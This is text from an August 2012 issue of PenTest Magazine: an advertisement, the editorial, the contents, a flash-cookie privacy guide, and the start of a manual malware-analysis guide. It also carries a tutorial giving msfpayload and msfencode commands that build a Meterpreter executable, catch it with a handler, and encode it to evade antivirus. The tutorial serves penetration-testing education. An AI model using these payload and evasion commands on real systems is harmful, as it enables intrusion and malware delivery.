Cyber Security Auditing Software

64

Transcript of Cyber Security Auditing Software

Cyber Security Auditing Software

www.titania.com

Improve your Firewall Auditing As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and �rewall devices. Any security issues identi�ed within those technologies will then have to be explained in a way that both management and system maintainers can understand.

he network scanning phase of a penetration assessment will quickly identify a number of security

weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail e.g. web service query tools. However this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices.

Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.

www.titania.com

Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania’s products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customer’s specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own companies styling. Each report can then be saved in a variety of formats for management of the issues.

Why not see for yourself, evaluate for free at titania.com

Page 4 http://pentestmag.com08/2012 (16) August

Editor’s notE08/2012 (16)

Managing Editor: Malgorzata [email protected]

Associate Editor: Trajce Dimkov [email protected]

2nd Associate Editor: Aby [email protected]

Betatesters / Proofreaders: Ed Werzyn, Johan Snyman, Jeff Weaver, Dan Felts, William Whitney, Marcelo Zúniga Torres, Harish Chaudhary, Tom Butler, Steven Wierckx, Richard Harold, John Borkowski, Stefanus Natahusada, Gareth Watters, Wilson Tineo Moronta, Emiliano Piscitelli, Alina Klis, David Kosorok

Senior Consultant/Publisher: Paweł Marciniak

CEO: Ewa [email protected]

Art Director: Ireneusz Pogroszewski [email protected]: Ireneusz Pogroszewski

Production Director: Andrzej Kuca [email protected]

Publisher: Software Press Sp. z o.o. SK02-682 Warszawa, ul. Bokserska 1Phone: 1 917 338 3631www.pentestmag.com

Whilst every effort has been made to ensure the high quality of

the magazine, the editors make no warranty, express or implied,

concerning the results of content usage.

All trade marks presented in the magazine were used only for

informative purposes.

All rights to trade marks presented in the magazine are

reserved by the companies which own them.

To create graphs and diagrams we used program

by

Mathematical formulas created by Design Science MathType™

DISCLAIMER!The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear PenTesters!Do you remember when you started with computers and you were an-noyed by numerous worms and viruses? Well, I can’t compare myself to you but since I was frustrated by my computer being vandalized by mali-cious bugs whose origin and existence on my computer I could not explain, I simply decided that “malware” will be a great idea for my next issue.

In the section Malware we start with Cookies. Yes, I know what you will say – we know it all. Really? Ayan Kumar Pan points out that even if you are sure that you deleted all your cookies, they are often more slay than you. It is a great guide to find and control the cookies and to lull your cookie concerns. Another great tutorial deals with MsfPayload & MsfEn-code. Two open source tools are practically described in order to teach and help us in encoding and thus bypassing the antivirus software on the target system. Next article by Adam Kujawa is devoted to manual identi-fication of malware. An amazing source of useful tips, background infor-mation, necessary tools and a great tour with the Malcode Analyst Pack that will make your work a lot easier. The section ends with a piece de-scribing not how to fight or detect malware but on the contrary, how to use it during a penetration test and do not fall into a malicious trap.

What is more? In this issue, as promised, we continue with Marc Gar-tenberg’s section on NISPOM. He himself admits that the topic can hardly be called appealing but you can be sure you will learn a lot and Marc will not make you feel sleepy. Exploitation Frameworks sections is still with us. This time we feature a very young learner who will guide you how to start with this popular but often a tricky topic. Our testers have loved its practicality and usefulness for beginners. I hope you will not be disap-pointed either.

Review section is all about malware to. Jeff Weaver presents to you a great book entitled Practical Malware Analysis. Check whether it is worth having and Jeff is a person whose opinions you can trust. Rishi Narang will tell you all you need to know about Damballa Failsafe, antimalware protection.

Our guest in this issue is Marcin Kleczynski from Malwarebytes. He came a way from a technician to the CEO of a great company. You should read this to learn how to do it and to hear how a proud boss can praise his team, his product and competition. What’s more, he still has time to do a pilot’s license, do polar plunges and raise money for Special Olympics.

From our regular sections as always Dean Bushmiller prepared for you something extra in PainPill. Do you consider yourself a salesperson? No? Dean will show you that you are and what you are selling requires devotion, patience and is based on relationship. Do you sell penetration testing services? No. Then, what DO you sell? Check! I regret I can’t see your faces when you will read this.

I hope that you will find this issue worthwhile. If you have any sugges-tions concerning topics, problems you want to read about or people you would like to know better thanks to PenTest. Please, feel free to contact us at [email protected].

Thank you all for your great support and invaluable help.

Enjoy reading!Malgorzata Skora& PenTest Team

Page 5 http://pentestmag.com08/2012 (16) August

MALWAREFlash Cookieby Ayan Kumar Pan

If you think you have deleted all the cookies from your computer, then think again. There are certain genres of persistent cookies that do not get terminated by the com-monly used ‘Clear Your Recent History’ option. One of them is a flash cookie.

MsfPayload & MsfEncode by Pankaj Moolrajani and Hitesh Choudhary

Malicious code or software are not at all new terms in the present era. Antivirus companies are trying hard to make the Internet safe and free from malware, but still the tight bond between flaws and features comes in between.

How to Manually Identify Malwareby Adam Kujawa

During the course of Penetration Testing, you may find yourself faced with a suspicious file or series of files which are not detected by any antivirus solution, in which case being able to manually determine whether a file is malicious or not is very important.

Using Malware During a Penetration Testby Trajce Dimkov and Henri Hambartsumyan

Malware is frequently used by cyber criminals to send spam, obtain account information, show unwanted adver-tisements, steal credit card numbers and obtain remote access to the internal network.

NISPOMThe Physical Aspects of Cybersecu-rity and Their Importance by Marc Gartenberg

NISPOM as a whole is designed to “prescribe the require-ments, restrictions, and other safeguards to prevent un-authorized disclosure of classified information.” That’s it. Plain and simple.

ExPLOITATION FRAMEWORKSExploitation Techniques: How You Should Startby Fabian “@samuirai” Faessler

Have you ever dreamed about writing your own 0day ex-ploit? I really want to do it, and I work hard to learn every-thing I can about it. This article is about the experiences I have had so far in learning about exploit techniques, and I want to share some of the noteworthy sources I stumbled upon in order to support other beginners.

CONTENTS

REvIEWPractical Malware Analysis: The Hands-On Guide to Dissecting Mali-cious Softwareby Jeff Weaver

Have you ever wanted to reverse engineer malware to see exactly what it does when it infects its host? To under-stand how malware propagates, or even understand the malware enough to write custom signatures for your IDS/IPS to save your network?

Damballa Failsafe: More Than a Mal-ware Protection Systemby Rishi Narang

Advanced malware, persistent threats (APTs), and zero-day targeted attacks are the buzz of today’s security in-dustry. Big and small corporates to vast infrastructures or SMEs are all victims to these stealthy targeted attacks.

INTERvIEWSome might call me a security ex-pert: Interview with Marcin Kleczyn-ski, CEO of Malwarebytesby Aby Rao

He started as a computer technician. Frustrated with criminal software he worked on a simple tool. This tool has been downloaded 200 millions times and he is a CEO of a company that stops advanced malware hands down.

CONFERENCEIt Is All About the Content: SecTor Conferenceby M.A. Hervieux

SecTor, the brainchild of founders of TASK, led by an im-pressive advisory committee composed of leading indus-try experts, is preparing for its 6th annual event coming this October.

PAINPILLSelling Services of Penetration Testingby Dean Bushmiller

As you are doing your test, you ARE doing the sales ac-tivity. Your task is difficult because you sell intangible – you are selling TRUST. You are saying, “Please trust us enough to attack your network.”

READSave the Database, Save the World – Chapter 6by John B. Ottman

06 38

1440

48

52

56

44

18

30

32

36

MAlWARE

Page 6 http://pentestmag.com08/2012 (16) August

This article sheds a light on flash cookies, its capabilities and its variance from HTTP cookies, thereby pointing out some advan-

tages related to personalization of your web ex-perience as well as some privacy concerns asso-ciated with it. Where to find the location of flash cookies on your computer is discussed, as well as the procedures for controlling and removing flash cookies.

What is a Flash Cookie?A Flash Cookie, otherwise known as Local Shared Object (LSO)/Flash Shared Object/Flash Super Cookie, is a data file that can be created on your computer by the websites (using Adobe Flash) you visit. It is used by all versions of Adobe Flash Play-er, and version-6 and above of Macromedia’s (now obsolete) Flash Mx Player. These are generally used to enhance your web-browsing experience. A website can write a cookie on your computer, and the next time you visit that website, it will load that cookie and its information in a way that provides a more customized experience.

For example, go to www.youtube.com >> click on a video to open it >> increase or decrease the volume of Flash Player >> close the browser and delete all the cookies. Now when you reopen your browser and watch any video on www.youtube.com,

you will find the exact same volume level set by you during your previous session. This is done by a flash cookie. This brings us to its variance from normal cookies, commonly referred to as HTTP Cookies.

How is it different from HTTP Cookie?In the previous section it was shown that even if you delete the cookies from your browser, the customisation is still there. This is because they are not stored in the same location as the HTTP cookies. They are capable of storing much more information about you than the HTTP cookies. An HTTP cookie, by default, can store 4 KB of data on your computer; whereas a Flash Cookie, by de-fault, can store 100 KB of data.

An HTTP cookie is limited to a single web brows-er. This means that if a cookie is created by a site for tracking you when you were using Firefox, that cookie will not be able to track you if you use Chrome or any other browser. This limit is not ap-plicable for flash cookies. It is because its bound-ary is not limited to a single web browser. No mat-ter which browser you use, the flash cookie will continue to track you and store data on your com-puter.

A flash cookie comes without any expiry date. This means that unless you delete them, they will

Flash Cookie

If you think you have deleted all the cookies from your computer, then think again. There are certain genres of persistent cookies that do not get terminated by the commonly used ‘Clear Your Recent History’ option. One of them is a flash cookie.

Page 7 http://pentestmag.com08/2012 (16) August

ing back that deleted HTTP cookie’s unique ID to the newly created cookie.

Where is it stored in your computer?In Windows, it is stored generally in: [Root Drive]:\Documents and Settings\[User

Name]\Application Data\Macromedia\Flash Player\ #SharedObjects\ (Figure 1). The important thing to note here is that the location is not limited to the aforementioned directory. Since a flash cookie is a file and every file has an extension, the flash cook-ie file uses .sol extension. You can search for all the flash cookies in your computer by typing *.sol in your computer’s search-bar. Here the asterisk (*) wildcard returns all files with a sol-extension. You should not assume that all those files listed with a .sol extension are flash cookies. Therefore, you should not be in a jiffy to remove them. Its removal is best carried out by the procedures mentioned lat-er in this composition. In Mac OS X, it is stored in:

~/Library/Preferences/Macromedia/Flash Player/#SharedObjects/

In UNIX/Linux, it is stored in:

~/.macromedia/Flash_Player/#SharedObjects/

How to control and remove Flash Cookies?Individual ControlNow I would like you to do a procedure previous-ly performed in the first section of this composition.

stay in your computer forever. On the other hand, the good thing about HTTP cookies is that they have an expiry date after which it is removed; and even if they do not have any expiry date, they are removed after you close the browser.

Flash cookies are stored in a binary format. So you will not be able to read and interpret its con-tents. On the other hand, the contents of HTTP cookies are stored as plain text. So even if you could not understand the content, at least you are in a position to read the content.

What is even creepier about flash cookies is its ability to reinstate the HTTP cookies after you have deleted them. One thing to be noted is that this is not done by all the websites installing flash cookies in your computer. It is only done by some unethical companies which have malicious inten-tions to track users at all costs. But when done, it is a serious violation of users' privacy. This more or less malicious practice is known as Cookie Re-spawning. And the HTTP cookie that has been reinstated can be called a Zombie Cookie, due to the fact that it can be re-spawned after being terminated. The process of cookie re-spawning is quite simple. A website installs a HTTP cookie and a flash cookie on the user’s computer. The flash cookie stores the HTTP cookie’s unique ID. When the flash cookie is activated, it checks for the existence of that HTTP cookie. If that HTTP cookie is not found on the user’s computer due to its removal by the user, the flash cookie cre-ates and installs another HTTP cookie by assign-

Figure 1. Path for the directory where the Flash Cookies are located on the author’s computer

MAlWARE

Page 8 http://pentestmag.com08/2012 (16) August

Go to www.youtube.com >> click on a video to open it >> increase or decrease the volume of Flash Player >> close the browser and delete all the cookies. Now when you reopen your browser and watch any video on www.youtube.com, you will find the exact same volume level set by you dur-ing your previous session. Now, repeat the same process again. However, this time, go to the loca-tion of the site’s flash cookie on your computer. In my computer, the location is C:\Documents and Settings\Ayan\Application Data\Macromedia\Flash Player\#SharedObjects\RWGKQHRQ\s.ytimg.com. Here exists a file named soundData.sol. This file is the flash cookie for the volume adjustment. Delete this file and open any video on www.youtube.com. It can now be noticed that the volume adjustment done in previous session does not exist anymore.

You might think that it is an easy way of remov-ing all the .sol files in your computer and delete each and every file. But that is not the right way to do it, since all the files with .sol extension may not necessarily be flash cookies. There are many ways to safely remove flash cookies from your computer.

You can do it individually for a site by visiting that site and adjust the storage settings. The default is 100 KB. You can set the other available sizes; which are 10 KB, 1 MB, 10 MB, and also unlim-ited. To do this for YouTube videos, go to a You-Tube video, right-click on flash player, a menu will appear, click on settings from that menu, now you can set the size-limit by using the slider as per your wish (Figure 2). Remember, if you select the size less than 10 KB (0 KB), you are in fact restrict-

ing YouTube from storing any flash cookie in your computer, and also deleting the previously stored flash cookies from YouTube.

Global ControlThe previous example can be tedious if you use a lot of sites that use flash cookies. Moreover, there are some websites which plant flash cookies by playing a small flash video and when this happens, you may not know about it. To view all the sites storing flash cookies on your computer and con-trolling them once and for all, go to Adobe’s web-site and use the slider to control the Website Stor-age Settings and the Global Storage Settings [4]. You can use the Website Storage Settings Panel to view all the websites which have stored flash cookies in your computer, remove some select-ed or all the flash cookies, prevent them from be-

Figure 2. Controlling flash cookies in YouTube

Figure 3. Website Storage settings Panel

Page 9 http://pentestmag.com08/2012 (16) August

ing stored on your computer, adjusting the size of flash cookie. If you select the size less than 10 KB (0 KB), you are in fact restricting the website from storing any flash cookie in your computer, and also deleting the previously stored flash cookies from that website (Figure 3).

You can use the Global Storage Settings Panel to specify the amount of disk space that websites you have not yet visited can use to store informa-tion on your computer. No flash cookies will be stored on your computer if you uncheck the option “Allow third-party Flash content to store data on your computer” (Figure 4). But remember that un-checking this option will remove all customisation done by you on a website and you will need to do your wished settings all over again.

Browser ControlIt can be categorised as proactive control and re-active control.

Proactive browser control refers to the web browser's ability to prevent storing of flash cook-ies when private browsing mode is enabled. It supports the privacy modes of Internet Explorer, Mozilla Firefox, Google Chrome (Incognito) and Apple Safari. The flash cookies that had been cre-ated in private browsing mode are discarded at the end of the session. Those created in a regular ses-sion are also not accessible in this mode. One hic-

cup in this proactive control is that it does not pre-vent some malicious-intent websites from trying to re-spawn cookies. One more method for proactive control is to disable the Shockwave Flash plugin (Figure 5). This would rather be a drastic step for taking control. This might be fine for some, but def-initely not fine for those who like to watch flash-based online videos and play flash-based online games. So, it would be better to use Adobe’s set-tings panel (as discussed in previous sub-section) and/or private browsing mode instead of disabling the Shockwave Flash plugin.

Reactive browser control refers to the use of third party software, better known as Add-ons/Ex-tensions, for your browser. The add-ons for Mozilla Firefox are BetterPrivacy, Privacy+, Click&Clean. Click&Clean is also available for Google Chrome.

Figure 5. Toggling the Shockwave Flash plugin Figure 7. Clear recent history

Figure 6. Custom settings for history

Figure 4. Global Storage Settings Panel

MAlWARE

Page10 http://pentestmag.com08/2012 (16) August

BetterPrivacy allows listing and managing flash cookies [5]. In this, you can delete flash cook-ies upon Firefox exit, on application start and al-so set a timer for deletion of flash cookies. More-over, a checkbox is added in the Firefox Options. Firefox >> Options>> Privacy >> Use custom set-tings for history (via drop-down menu) >> check on the ‘Clear history when Firefox closes’ >> click on the activated ‘settings’ button >> check on ‘flash cookies’ and click OK (Figure 6). Similarly, anoth-er checkbox for deleting flash cookies is added in ‘Clear Recent History’ (Figure 7). However, if you do not want all the flash cookies to be automati-cally removed, then you can disable the automatic deletion function and manage individual cookies from the presented list (Figure 8).

Privacy+ adds a checkbox in the Firefox Options [6]. You can access it via: Firefox >> Options>> Pri-vacy >> Use custom settings for history (via drop-down menu) >> check on the ‘Clear history when Firefox closes’ >> click on the activated ‘settings’ button >> check on ‘flash cookies’ and click OK (Fig-ure 9). This is similar to the feature added by Better-Privacy discussed above. BetterPrivacy edges this add-on since it can also help the user manage in-dividual cookies apart from having this option also.

Click&Clean perform functions similar to Pri-vacy+, and is developed by hotcleaner.com [7]. It adds a button to the browser’s interface from

where you can perform the desired actions. Click the button, a drop-down menu will appear >> Op-tions >> Clear private data when browser closes >> uncheck ‘disable’ >> Advance >> check on ‘Flash Local Shared Objects (LSO)’ (Figure 10). In addition to remove flash cookies, this extension has a host of other utilities for your computer such as disk clean-up, malware scan and many more. So, it is a multi-purpose extension.

Figure 8. Managing flash cookies

Figure 9. Clearing flash cookies via Privacy+

Page11 http://pentestmag.com08/2012 (16) August

Desktop ControlThis implies that flash cookies can also be con-trolled by application software. One such software is CCleaner [8]. It is multi-purpose software with a lot of other useful utilities. For cleaning flash cook-ies, open CCleaner >> select ‘Cleaner’ tab >> se-lect “Applications’ tab >> go to ‘Multimedia’ and check on ‘Adobe Flash Player’ >> Run Cleaner. Here, you can also view the files by clicking the ‘Analyze’ button (Figure 11).

Still having privacy concerns?Most of the web users are concerned about their pri-vacy due to persistent news about companies track-ing their activities. Now there is good news for them.

There are certain tools and features which can let us know which websites are tracking them and then block some or all those sites as per wish.

To begin with, there is an add-on for Firefox, called Ghostery, which lets you know about the sites tracking you online [9]. It will display a list of trackers when you open a site. By that list, you can know about that item and also block it if you want (Figure 12).

The new versions of the some web browsers have included a Do Not Track feature. This allows you to let a website know you would like to opt-out of third-party tracking for purposes including be-havioural advertising. It does this by transmitting a Do Not Track HTTP header every time your data is requested from the Web. To activate this in your Firefox, go to Firefox >> Options >> Privacy >> check on ‘Tell websites I do not want to be tracked’ (Figure 13).

Like the previous feature, there is an add-on called Do Not Track Plus, that blocks tracking tech-nologies which advertisers and other companies use to track your browsing behaviour. Moreover, it automatically blocks websites from following you and easy to customize settings. It is available for all the popular web browsers.Figure 10. Clearing flash cookies via Click&Clean

Figure 11. Clearing flash cookies via CCleaner

MAlWARE

Page12 http://pentestmag.com08/2012 (16) August

ConclusionOpinions are generally divided as use of flash cookies is concerned. This is because some use it in a good way to give you a personalized web experience, while some use it maliciously to track or gain private information about you. But with the various tools and techniques explained in this ar-

ticle for managing flash cookies, along with the Do Not Track feature, you should surf the amazing web without any worries.

Figure 12. Ghostery

Figure 13. Enabling the Do Not Track feature in Firefox

References and further reading[1] www.adobe.com[2] www.websiteadministrator.com.au[3] www.practicalecommerce.com[4] www.macromedia.com/support/documentation/en/

flashplayer/help/settings_manager07.html[5] addons.mozilla.org/en-US/firefox/addon/betterprivacy[6] addons.mozilla.org/en-US/firefox/addon/privacy[7] www.hotcleaner.com/clickclean_chrome.html[8] www.piriform.com/ccleaner/download [9] www.ghostery.com/download

AYAN KUMAR PANAyan Kumar Pan holds an M.Tech degree in Information Security and Computer Forensics from SRM Uni-versity, Chennai, India; and a B.Tech degree in Information Technology from National Institute of Technol-ogy, Patna, India. He has worked as

an Intern in National Informatics Centre, Port Blair, In-dia. He has secured A+ grade four times in various Na-tional Level Mathematics Aptitude Tests. Twitter: @ay-ankumarpan

MAlWARE

Page14 http://pentestmag.com08/2012 (16) August

MsfPayload & MsfEncode Malicious code or software are not at all new terms in the present era. Antivirus companies are trying hard to make the Internet safe and free from malware, but still the tight bond between flaws and features comes in between. The pre-installed utilities in BackTrack Machine (i.e., msfpayload and msfencode) can make you insecure about the safety of the Internet by simply showing you a simple PDF file with malicious intent.

Msfpayload can generate a payload in .exe, ruby, Perl or in .dll format, which can run on 32 bit, as well as 64 bit platforms. In

addition, combining this payload generating utility with msfencode a person can easily encode the payload, many times over to bypass antivirus mea-sures.

Target AudienceThis article is a simple demonstration on com-bining both of these utilities so that anyone us-ing BackTrack can follow the step-by-step use of these two utilities. The unsuspecting audience can get caught by a malicious file, since it is so easy to create and deliver it to the victim.

ScopeTrojans and payloads cause about $13 billion of damage annually. (http://www.computereconom-

ics.com/article.cfm?id=1225). Every year many of these payloads are activated in March, due to heavy flow of currency during that month. As we talk about the scope of the victims, we can say that most of the Windows-based users can be compro-mised. But, with the help of these two utilities one can easily transform the same attack to Linux ma-chines as well.

How can we forget the power of open source? Msf-Payloads and Msf-Encoders are open source tools and are easy to use. There are 800+ pay-loads and 245+ encoders available within these two applications.

Hardware/Software Requirements No specific hardware requirement are necessary for this exploit. The software requirement is Back-Track Revision-2 machine, as the attacker. We will be using Windows xP-SP2 (fully patched and up-

Figure 1. # cd /pentest/exploits/framework2

Page15 http://pentestmag.com08/2012 (16) August

dated), as the victim machine. Note: Windows 7 could have also been used for this demonstration.

Explanation of scenarioFor the new user of BackTrack machine, I would consider this a highly advanced RAT (like prorat) that is capable of doing many things beyond your imagination. Likewise, we have to transfer a mali-cious file to the victim and a RAT (Remote Admin-istration Tool) is capable enough to get a reverse connection. With the help of the msfpayload utility, one can get a reverse connection from the payload that was generated.

In this scenario, we are trying to upload a mali-cious file to a local server of BackTrack. Then a demonstration on how one can get a reverse con-nection from the payload. Apart from this we will also use the msfencode utility that already has a variety of encoders, like shikata, to help us in en-

coding and thus bypassing the antivirus software on the target system.

Attack Scenario and ImplementationWe are using a BackTrack machine to use the ms-fpayload utility and we are using Windows xP-SP2 (fully patched) machine as a victim. Using the be-low command, one can use this pre-installed utility that is shipped with Metasploit in BackTrack:

# cd /pentest/exploits/framework2 (Figure 1)Msfpayload -h (Figure 2)

This command will help any new user to bet-ter understand the utility as it gives its functional-ity and its usage with more details. One can sim-ply choose any payload from a variety and just by using an “S” option, a summary screen can be seen about the details of the specific payload.

Figure 3. # msfpayload windows/meterpreter/bind_tcp

Figure 2. Msfpayload -h

MAlWARE

Page16 http://pentestmag.com08/2012 (16) August

Figure 4. # msfpayload windows/meterpreter/bind_tcp RHOST=192.xxx.xxx.00 X > hitesh.exe

Figure 6. A Multi Handler Exploit

Figure 5. A Web Server Download

Page17 http://pentestmag.com08/2012 (16) August

HITESH CHoUDHARYHitesh Choudhary is an India based eth-ical hacker working for the welfare of society. He is also founder of a free vid-eo portal to learn variety of technology over the internet at http://www.itube.ig-neustech.com. He has also provided his lectures to a variety of industries, as well as institutions. You can visit his home

page at www.hiteshchoudhary.com

PANKAj MoolRAjANIPankaj Moolrajani is an India based se-curity researcher at Igneus technolo-gies. He is RHCE & RHCSS Certified.

In this case we have chosen meterpreter, as it is the most powerful payload that I have seen so far.

# msfpayload windows/meterpreter/bind _ tcp (Figure 3)

If you noticed in Figure 3 the connection with the victim will happen over the port 4444, but the val-ue of rhost is not specified. So all we have to do is fill this value. In our case, the Remote IP is 192.168.80.129, which I have used for demo pur-pose. Now we will create an executable for Win-dows called hitesh.exe

# msfpayload windows/meterpreter/bind _tcp RHOST=192.xxx.xxx.00 X > hitesh.exe (Figure 4)

Let us say that attacker was successful in trans-ferring the file to victim. In our case I have trans-ferred it via a web server download (Figure 5).

Coming back to the BackTrack machine, we now have to set a multi handler exploit.

#msfconsole#use exploit/multi/handler#set PAYLOAD windows/meterpreter/bind_tcp#set RHOST 192.168.xxx.xxx#exploit

Having a meterpreter session means a lot to any researcher, since they can easily download, up-load, sniff keylogs, piviot the machine, or use a variety of other tasks.

This is just a basic demo of interacting with msf-payload. Another interesting encoding mechanism is msfencode and is very simple to use as well.

#Msfencode –h

One thing worth mentioning here is that the out-put of msfpayload should be in a raw format to be

encoded by this utility. We are using the shikata ga nai encoder, which is a Polymorphic xOR ad-ditive feedback encoder.

#msfpayload windows/meterpreter/bind_tcp RHOST=192.xxx.xxx.xxx R | msfencode –e x86/shikata_ga_nai -c 3 -o encode.exe

I have tested this encode.exe with a variety of an-tivirus engines and in just 3 iterations 10 antivi-rus engines out of 38 were not able to detect it. I would even go so far as to say that there’s no harm in running more iterations till the file is unde-tected by more of the antivirus engines. Encoding your payload is easy to do and foils the antivirus engines with ease using these simple tools – msf-payload and msfencode, so add them to your tool belt and be a better pentester.

Figure 7. #msfpayload windows/meterpreter/bind_tcp RHOST=192.xxx.xxx.xxx R | msfencode –e x86/shikata_ga_nai -c 3 -o encode.exe

MAlWARE

Page18 http://pentestmag.com08/2012 (16) August

This article is meant to teach anyone how to determine whether a suspicious file is mali-cious or not, it will go over topics like obtain-

ing static file data to using online scanners and ex-ecuting files in a secure analysis environment.

Real-World SituationOne of the requirements of performing a thorough and detailed penetration test requires the knowl-edge that the target network is not already com-promised by malicious actors or malware. In which monitoring network traffic logs, open ports and run-ning malware scans on individual systems is es-sential to confirming a clean base to start from.

This article directly approaches methods to use in the case of the following situation:

Jon PenTester has scanned a target network with multi-ple types of antivirus solutions before he begins any pen-etration attempts from outside of the network. All scans come up clean and he is about to start when he decides to do one more network traffic capture on the networks border server. After a few hours he investigates the traffic and notices some unusually high traffic originating from a currently unused system. He double-checks that there is no one using the system and determines that there must be some other processes running on the system. When he goes into see which processes are using network resources,

he discovers an unfamiliar process running from the Sys-tem32 directory, he is able to kill the process and make a copy of the process executable. He extracts it from the sys-tem and now has to determine whether or not this file is part of a legitimate application or if it is an undetected malicious file.

NotesOne of the most important and useful things a would-be malware analyst can do is to take exten-sive and detailed notes while performing the analy-sis, notes would consist of:

• Filenames• Hashes• File Sizes• Executable Operations• File Locations• Network Traffic observed• Memory Addresses• Function Imports• Etc.

I personally like to gather a large amount of infor-mation and write a comment to myself about what I think is going on, what I think the executable might be, what it might be trying to do and where I should focus my attention as I continue to prove

How to Manually Identify MalwareDuring the course of Penetration Testing you may find yourself faced with a suspicious file or series of files which are not detected by any antivirus solution, in which case being able to manually determine whether a file is malicious or not is very important.

Page19 http://pentestmag.com08/2012 (16) August

• What other process might the suspicious file have injected into?• Malware uses process injection all the time

to hide behind legitimate processes like ‘svchost.exe’. They do this in order to make their operations seem less suspicious. If you notice odd behavior from a legitimate pro-cess, use something like Process Explor-er to find out what files might be using its memory space, this is also a good way to find malicious DLL files.

• Operating System Info• While this might not be necessary if every

system on the network is the same, if you happen to find odd behavior coming from a server or the one system with a different op-erating system than the rest it is a good idea to take note of which operating system is be-ing used. Malware often checks to see which OS it is running on in order to determine courses of action. During dynamic analysis, you may find that a possible malware sample will only run on Windows 7 or Server 2003.

• Current Account• Be sure to write down what type of account

the suspicious file is running on, is it Admin-istrator or User? Check the file permissions and the owner/creator of the suspicious file. This might also be useful while attempting to recreate the infection during the Dynam-ic Analysis phase.

• Time/Date• The file created/modified/accessed date and

times might not be accurate since malware usually modifies these values if it is attempt-ing to hide as a legitimate process. Howev-er, take these down anyway because you may be able to determine when the infection originally happened.

Environment SetupOne of the most important things to do before per-forming analysis on a suspicious file is to build an environment which can accommodate nearly ev-ery possible tool you need to perform a full analy-sis. How secure or protected the environment is depends on how deep you plan to go with your analysis and how much you think you need to pro-tect yourself.

Analysis SystemWhile performing analysis you do not want to ac-cidentally infect your own system with malware,

or disprove my theories. This helps keep track of what you have done and allows you to easily ref-erence any of the previously collected data.

Background InformationWhen performing forensics of any kind, it’s best to collect as much data about an incident and the environment as possible before doing any deeper digging; in cases with possible malware, the same principals apply. However, without the use of a computer forensics team to grab system images or use specialized forensics tool like the Forensics Toolkit (FTK), gathering the easiest to obtain in-formation is your best bet. Before you start, you should take note of a number of variables to make your job easier:

• File Location • Where was the file located when you found

it? Was it in a generic folder like %temp% or in a more specific one?

• Were there any parent or child processes run-ning with the suspicious process?• Using a tool like Process Explorer (which

we will discuss later) you can easily tell if the suspicious process was spawned by an-other process or has spawned a process on its own. This information can tell you wheth-er or not there are more files which need to be collected and analyzed.

• Network Traffic• If odd traffic was what lead you to the sus-

picious file, make sure you capture as much of it as possible, regardless of whether it is encrypted or not. Take note of its destina-tion, if you notice a pattern such as beacon-ing, how often does it do that? These kinds of traits might lead you to identify the file as malware later on and even which malware family it belongs to.

• What ports (if any) was the process using?• You can easily find this out by using a built-

in command line tool like ‘netstat’ or a graphical tool like TCPview. Both of these tools allow the user to monitor port activity.

• What libraries were being accessed?• A good clue into the intent of a suspicious

executable is which native Windows librar-ies it is using to complete its operations. Li-braries like WS2_32.dll for example gen-erally mean there is network activity while GDI32.dll means that there is probably a GUI being used.

MAlWARE

Page20 http://pentestmag.com08/2012 (16) August

so you will need a separate one to perform your analysis, preferably one that is not connected to the internet or any external facing network. I rec-ommend using a virtual machine to perform your analysis. You could use any virtual environment program you like as long as it can take snapshots and you can revert to previous saved states.

virtual machines have the most benefits for mal-ware analysis and therefore are the most regular-ly used and recommended. However, some situ-ations may require the use of a physical system and in such cases; it’s a good idea to keep one on stand-by if you ever need it.

operating SystemWhile using multiple operating systems is recom-mended when performing analysis, the best thing to do for forensics purposes is to attempt to use the same operating system and/or image used by the network which is currently being tested, this ensures that all possible functionality can be du-plicated in the analysis environment as it would be on a user machine.

ToolsThere are a lot of different tools available for purchase and for free that can assist in the analysis of a suspi-cious binary, everything from scanners, monitors and debugging tools to system snapshot tools which can compare changes between two states. Here is a list of some of the most widely used and useful tools:

• Wireshark• SysInterals/WinInternals Suite• RegShot• PE Explorer• PEID• Malcode Analyst Pack

As mentioned before, there are lots of tools and it usually comes down to what you are comfort-able with and personal preference. We will go in-to more detail about the purpose and use of the above tools as we continue.

Static AnalysisThe term Static Analysis, usually refers to obtain-ing data about the file in question by examining the file in an unexecuted state. The types of data you should investigate and takes notes on are:

• File Properties• Interesting Strings

• Section Headers in use/location/sizes• Packer used• Compile Date• Dependencies• Interesting Icon Used• Anything else unique or suspicious about the

file

Static Analysis ToolsEach phase of file analysis requires its own set of tools which are used to gather data obtained by performing said step. There are three very partic-ular tools for performing static analysis that I will discuss: Malcode Analyst Pack, PEID and PE Ex-plorer.

Malcode Analyst Pack (MAP)The Malcode Analyst Pack, or MAP, is a set of dif-ferent tools which help a malware analyst do his job. It includes a series of useful programs which perform things like rerouting DNS requests and converting shellcode to an executable. It also in-cludes some nifty “extensions” which can be in-stalled into the operating system and help out with static analysis. We are going to use only one of these extensions to gather some of the above mentioned data. The company iDefense who orig-inally created the tool no longer supports down-loads, however you can still find the installer Here or just do a search for it online.

